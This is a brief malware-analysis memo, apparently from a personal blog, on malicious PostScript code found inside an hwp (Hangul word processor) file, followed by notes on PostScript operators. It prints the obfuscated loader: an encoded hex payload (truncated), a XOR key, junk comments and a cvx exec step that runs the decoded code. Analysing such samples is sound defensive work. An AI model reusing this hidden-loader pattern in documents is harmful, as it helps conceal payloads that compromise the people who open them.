Malicious postscript code in hwp
I found a hwp(Hangul word processor) file which contains malicious postscript code. I take some analysis notes for my memo. Malicious postscript code is as following. /X240 <0632E7CB1D9F2067FDA9197F289976CC…snip…> def %kshvudgsjsye3 0 1 X240 length 1 sub % %kshvudgsjsye3 {/Y31 exch 1 2 and pop def %kshvudgsjsye3 X240 dup Y31 get <296BD6EB2CA90321BBEF5F5F4CFC10EC> Y31 15 and /Y104 8 def get xor Y31 exch put} for X240 cvx % exec I’ve googled and found some coding rules. ・Anything following a % on a postscript program line is ignored by the interpreter. ・initialize variable i with value 0 /i 0 def ・set each element of array ar to value n 0 1 ar length 1 sub {ar exch n put} for ・ exch Exchange the top two values of stack. ・ dup Duplicate the top element of stack. ・logical ' and ' operator. a&&b a b and ・ <hexadecimal string> cvx makes string executable ・ <hexadecimal string> cvx exec m